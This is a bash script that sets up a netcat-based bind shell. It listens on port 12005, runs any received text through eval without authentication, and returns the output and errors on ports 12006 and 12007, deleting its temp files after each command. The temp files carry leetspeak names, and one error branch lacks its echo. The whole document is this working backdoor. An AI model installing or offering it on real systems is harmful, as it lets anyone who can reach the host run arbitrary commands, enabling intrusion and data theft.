#!/bin/bash
inputfile="/tmp/c0mmand.txt"
stdoutfile="/tmp/std0ut.txt"
stderrfile="/tmp/std3rr.txt"
inputport="12005"
outputport="12006"
errorport="12007"
while : ; do

	echo "Awaiting command..."

	nc -l -p "$inputport" > "$inputfile" & # initiate 1 nc connection, dont repeat it
	while : ; do
		command="$(cat $inputfile)"	
		echo "" > $inputfile
		if [[ "$command" == "" ]] ; then
			echo -en "Nothing...\r"
		else 	
			echo "Command received: $command"
			break
		fi
	done

	pkill -P $$ nc

	eval "$command" > $stdoutfile 2> $stderrfile && echo "Command executed succesfully!" || echo "Command execution finished unsuccesfully..."
	echo -e "Output when executing $command;\n$(cat $stdoutfile)\n\n" | nc -l -p $outputport && echo "Standard output finished succesfully!" || "Stadard output finished unsuccesfully..."
	echo -e "Error when executing $command:\n$(cat $stderrfile)\n\n" | nc -l -p $errorport && echo "Standard error finished succesfully!" || echo "Standard error finished unsuccesfully..."
	pkill -P $$ nc

	timeout 10 rm -f $stdoutfile  $inputfile $stderrfile && echo "Removed /tmp files succesfully!" || echo "Removed /tmp files unsuccesfully..."

done
exit 0


